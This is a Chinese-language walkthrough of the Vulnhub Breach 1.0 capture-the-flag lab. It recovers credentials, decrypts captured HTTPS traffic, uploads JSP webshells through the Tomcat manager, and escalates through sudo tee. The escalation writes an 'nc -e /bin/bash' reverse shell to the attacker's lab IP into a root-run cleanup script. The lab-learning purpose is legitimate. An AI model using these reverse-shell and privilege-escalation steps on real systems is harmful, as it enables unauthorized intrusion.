Vulnhub簡介
Vulnhub是一個提供各種漏洞環境的一個靶場平臺,大部分環境都是虛擬機鏡像檔案,預先設計各種漏洞
需要使用VMware或VirtualBox 運行,每個鏡像都有破解的目標,從啟動虛擬機到獲取系統的 root 權限和查看 flag
https://www.vulnhub.com/
Breach1.0靶機資訊
breach1.0 是一個難度初級到中級的Boot2Root/CTF挑戰
靜態ip(192.168.110.140),配置環境到同一個網段,我用的kali (192.168.110.128)來進行滲透
下面開始
資訊收集
埠簡單掃一下,好家伙基本上埠都是開放的,肯定是有問題的

訪問192.168.110.140的 80 埠進入web頁面

谷歌翻譯了一下,哈哈哈

漏洞挖掘
1、右鍵查看首頁原始碼,注意到注釋很可疑,是一段base64 編碼

兩次解碼得到一串賬號密碼

2、首頁圖片可以點擊跳轉,其他幾個頁面都是圖片啥的,最后一個是 impresscms登錄頁


既然是登錄頁,那就用之前得到的賬號密碼嘗試登錄,登錄成功,注意到有三封郵件

郵件三發現保存一個SSL證書,訪問下載一個SSL證書的密鑰庫keystore,keystore是儲存公私鑰的一種檔案格式

3、回傳到左邊的功能選單,挨個查看了一下,profile 目錄也看了一下,沒發現什么漏洞

但找到一個很可疑的SSL,想到之前拿到的SSL密鑰庫,就點進去看了


谷歌翻譯了一下

得到storepassword and keypassword are all set to 'tomcat'.,提到了無法讀取檔案很有可能就是流量包被前面的SSL加密了
訪問下載流量包,wireshark打開應該是加密了流量



4、成功匯出 .p12 證書,然后就是把他匯入到wireshark,匯入證書后HTTPS被解密,查看流量包
可以看到原來的一些TLS加密的變成了HTTP
最新版wireshark已經 把SSL 改為 TLS,其實SSL/TLS 都已統稱通信加密協議

看樣子像是被掛了圖片馬,執行了cmd

追蹤http流,獲得Tomcat后臺登錄地址http://192.168.110.140:8443/_M@nag3Me/html
采用http basic 認證,包含了用戶名和密碼的資料包 Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC
base64 解碼得到tomcat:Tt\5D8F(#!*u=G)4m7zB


然后就是去訪問Tomcat 后臺登錄

Tomcat后臺的 getshell 有標準姿勢,上養馬場,準備好jsp版本的各種嗎,像cmd小馬,菜刀馬,jspspy大馬,打包成 .zip ,在改成 .war,上傳部署

5、發現問題,用菜刀去連,一會兒就會斷開,檔案被洗掉,需要重新上傳 war 包,猜測主機可能有殺軟或者殺webshell的工具
解決方法,用bash反彈一個shell給我們
可以看我的另一篇文章
Linux反彈shell
查看當前系統用戶 cat /etc/passwd ,注意到兩個值的關注的用戶,root就不用說了,我們關注的主要是有bin/bash權限的用戶

進到網站根目錄發現兩個很長的檔案名的php檔案,打開看是資料庫的連接檔案,用戶是 root 密碼是空

登錄mysql資料庫,查詢user表,拿到milton的密碼MD5 thelaststraw

提權到 milton用戶

查看歷史命令,看到su blumbergh,需要找到這個用戶的密碼

在根目錄下有6張圖片,用 exiftool 查看詳細資訊,在bill.png 下看到可疑的注釋coffeestains


6、嘗試登錄blumbergh,提權成功,歷史命令里發現有可疑檔案

進入這個檔案,這是個清理腳本,每三分鐘執行清理洗掉webapps目錄下的所有檔案,所以之前的菜刀一直會斷連就是被清理了

sudo -l查看sudo 權限,發現能夠以 root權限執行 tee 和 tidyup.sh,tee 命令用于讀取標準輸入的資料,并將其內容輸出成檔案,tidyup.sh就是清理腳本

7、想法就是利用 tee 以 root的權限向清理腳本寫入反彈 shell,拿到 root權限
nc反彈shell
echo "nc -e /bin/bash 192.168.110.128 4444" > shell.txt
使用 tee命令將shell.txt寫到 清理腳本
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
查看是否寫入
cat /usr/share/cleanup/tidyup.sh

成功寫入,nc監聽等待反彈shell,root權限

查看隱藏檔案,打開 flag.txt ,通關

總結
也是第一次寫這種滲透的練習靶場,遇到了很多的坑,比如說各種環境的奇怪報錯,linux操作不熟等等很多問題
通過查閱檔案資料一個一個問題復現解決也學到了很多,還會繼續練習記錄靶場學習
道路是曲折的,回首是牛逼的
哈哈哈
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/298605.html
標籤:其他
上一篇:靶機滲透SickOs1.2(非常詳細,適合新手滲透)
下一篇:HCIA筆記-----第二天
